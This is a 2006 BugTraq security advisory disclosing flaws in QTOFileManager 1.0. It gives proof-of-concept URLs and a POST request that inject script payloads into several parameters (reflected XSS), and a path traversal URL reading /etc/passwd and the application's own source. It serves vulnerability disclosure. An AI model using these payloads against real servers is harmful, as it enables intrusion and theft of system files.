BugTraq
QTOFileManager 1.0 Jul 02 2006 09:18PM
securityconnection gmail com
--------------------------

Cross Site Scripting (XSS)

--------------------------

http://target.xx/qtofm.php?delete=%3Cscript%3Ealert(%22Ellipsis%20Securi
ty%20Test%22)%3C/script%3E&u=[username]&pathext=1

http://target.xx/qtofm.php?delete=COPYING&u=[username]&pathext=%3Cscript
%3Ealert(%22Ellipsis%20Security%20Test%22)%3C/script%

3E

http://target.xx/qtofm.php?u=[username]&pathext=%3Cscript%3Ealert(%22Ell
ipsis%20Security%20Test%22)%3C/script%3E&edit=1

http://target.xx/qtofm.php?u=[username]&pathext=1&edit=%3Cscript%3Ealert
(%22Ellipsis%20Security%20Test%22)%3C/script%3E

---

POST http://target.xx:80/qtofm.php?u=[username]&pathext=1&edit=readme%2Etxt HTTP/1.0

Accept: */*

Content-Type: application/x-www-form-urlencoded

Host: target.xx

Content-Length: 117

u=[username]&pathext=%3Cscript%3Ealert(%22Ellipsis%20Security%20Test%22)
%3C/script%3E&newcontent=1&save=Save&savefile=1

--------

http://target.xx/qtofm.php?edit=../../../../../../../../../../../../etc/
passwd&u=[username]&pathext=

http://target.xx/qtofm.php?edit=qtofm.php&u=[username]&pathext=

-----------------

Ellipsis Security

http://ellsec.org

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus